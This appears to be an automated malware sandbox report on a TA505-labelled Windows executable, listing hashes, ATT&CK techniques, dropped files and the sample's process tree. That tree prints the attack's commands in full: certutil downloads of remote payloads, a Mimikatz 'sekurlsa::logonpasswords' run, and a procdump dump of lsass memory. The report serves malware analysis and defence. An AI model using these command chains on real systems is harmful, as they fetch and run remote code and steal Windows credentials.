ta505 | df9018383b6488d0c89bbf7063bd1143877ec6f99abf55b1c6846457baa7e080

Resubmissions

13-12-2023 16:00

231213-tfqc8sgdh6 10

13-12-2023 15:46

231213-s7452agch8 10

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2023 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
Size

3.9MB
MD5

37130df0dc6057afaf677c2907eebdb4
SHA1

75caff36d1115049d605f91a651bf0f8479118cc
SHA256

08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c
SHA512

357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274
SSDEEP

49152:WYS35HobXrb/TavO90dL3BmAFd4A64nsfJoJLNXdCVpo/MFKQm8cjdFiMLz4zy4y:WYCobCJZ0S5Qmxvl4fEwe8xj/E

Score

10^/10

ta505

Malware Config

Signatures

TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
ta505

Executes dropped EXE 2 IoCs

pid	Process
4768	procdump.exe
4136	procdump64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4768	procdump.exe
4768	procdump.exe
4768	procdump.exe
4768	procdump.exe
4136	procdump64.exe
4136	procdump64.exe
4136	procdump64.exe
4136	procdump64.exe
4136	procdump64.exe
4136	procdump64.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4768	procdump.exe
Token: SeDebugPrivilege	4136	procdump64.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3588 wrote to memory of 2148	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	24
PID 3588 wrote to memory of 2148	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	24
PID 2148 wrote to memory of 2096	2148	cmd.exe	25
PID 2148 wrote to memory of 2096	2148	cmd.exe	25
PID 3588 wrote to memory of 4232	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	79
PID 3588 wrote to memory of 4232	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	79
PID 4232 wrote to memory of 1224	4232	cmd.exe	75
PID 4232 wrote to memory of 1224	4232	cmd.exe	75
PID 3588 wrote to memory of 2580	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	78
PID 3588 wrote to memory of 2580	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	78
PID 2580 wrote to memory of 4388	2580	cmd.exe	76
PID 2580 wrote to memory of 4388	2580	cmd.exe	76
PID 3588 wrote to memory of 2000	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	77
PID 3588 wrote to memory of 2000	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	77
PID 3588 wrote to memory of 1472	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	106
PID 3588 wrote to memory of 1472	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	106
PID 1472 wrote to memory of 1204	1472	cmd.exe	105
PID 1472 wrote to memory of 1204	1472	cmd.exe	105
PID 3588 wrote to memory of 1688	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	113
PID 3588 wrote to memory of 1688	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	113
PID 1688 wrote to memory of 4768	1688	cmd.exe	112
PID 1688 wrote to memory of 4768	1688	cmd.exe	112
PID 1688 wrote to memory of 4768	1688	cmd.exe	112
PID 3588 wrote to memory of 5036	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	116
PID 3588 wrote to memory of 5036	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	116
PID 5036 wrote to memory of 3592	5036	cmd.exe	114
PID 5036 wrote to memory of 3592	5036	cmd.exe	114
PID 4768 wrote to memory of 4136	4768	procdump.exe	117
PID 4768 wrote to memory of 4136	4768	procdump.exe	117
PID 3588 wrote to memory of 3492	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	120
PID 3588 wrote to memory of 3492	3588	08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe	120

C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe
"C:\Users\Admin\AppData\Local\Temp\08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3588
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b
    3⤵
    PID:2096
- C:\Windows\system32\cmd.exe
  cmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  cmd /c "expand mim mimi.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2580
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -decode mim.b mim"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4232
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- C:\Windows\system32\cmd.exe
  cmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1688
- C:\Windows\system32\cmd.exe
  cmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- C:\Windows\system32\cmd.exe
  cmd /c "start gg.lnk"
  2⤵
  PID:3492

C:\Windows\system32\certutil.exe
certutil -decode mim.b mim
1⤵
PID:1224

C:\Windows\system32\expand.exe
expand mim mimi.exe
1⤵
PID:4388

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\procdump.exe
procdump.exe -accepteula -ma lsass.exe lsass.dmp
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Users\Admin\AppData\Local\Temp\procdump64.exe
  procdump.exe -accepteula -ma lsass.exe lsass.dmp
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4136

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk
1⤵
PID:3592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\gg.lnk

Filesize
49KB

MD5
2c0c8685f495c8606a514b642661d413

SHA1
8009dc1897ac6f8e739993c398cbb1119b3ce0c6

SHA256
2a28fbdb28199c4140b3fe6ac454470ceac2f3ef8f3adab217caad4c01a83eb1

SHA512
19ff76ca484771d4c003dbfc0e7d0f61744d9c8c6c12ca840224948bd4b6971ba3b4cc4e8c880f5f651a09759123d946eb590d21a7a360f49717eab43937caac

Download Submit
C:\Users\Admin\AppData\Local\Temp\mim.b

Filesize
14B

MD5
3be7b8b182ccd96e48989b4e57311193

SHA1
78fb38f212fa49029aff24c669a39648d9b4e68b

SHA256
d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed

SHA512
f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump.exe

Filesize
542KB

MD5
0e3c336c3d4336220235d564e402e7f8

SHA1
8fe18799516bba9b84a1e6ae7fed523e9eda44de

SHA256
34885f2ae6bfea4a830a4e24c91e59737147c527e90b763089174a25ab265943

SHA512
a91ded42befff9da8384bf8cf36d379a782c83769686cb712836433df8fd40ff669af58f48a4606ac698a84d4625657c75560dc612019bef0e5453557d94a92d

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump.exe

Filesize
624KB

MD5
8a36a0c29bc3f5a56f464bc35055dd4d

SHA1
49128a8d1d8f2897db5111da8a2dbb77a95eddfc

SHA256
ff02949a9555801b03e69d279bc32948c53d68eed4409453cc233f8353047aa0

SHA512
b2173f3f79a70656092b497127c9bc8354bf7ae3bd6cf7cacbad69539791d40b225fd4b1391aa438d26a03063305b147352f6a4dae0bf13730a86920919c0bad

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump64.exe

Filesize
267KB

MD5
06ad74be90f710b9d4a6e1f27d5e3994

SHA1
dd9edfc6b7593c550b9b5aea44f5754e709dfd8c

SHA256
ff3dee2c0bf247bc92678204e7c744810c3e39e2f8a927aac570d2b853358c7a

SHA512
a319b77a73da9c1d6aaf0585880911b7d821931410c13f42d3765ba60f87e731e612bfad6e922c407e6a011785369813acc8985808ba6e9bffc425a3446dadb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\procdump64.exe

Filesize
414KB

MD5
68a1f7c796de1d0df6b2d78e182df3a0

SHA1
43e3521e0403636150ac0c6c4da6a536f0ab504f

SHA256
5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61

SHA512
616f2f165c8a32eca18a9f2ef14325c1d89c1ae97efd8c89eaa9adc9f527b940700a5c9ede93ae2218e0b58553a23effc6a4e48b8498eb83cfc723cbcf241d01

Download Submit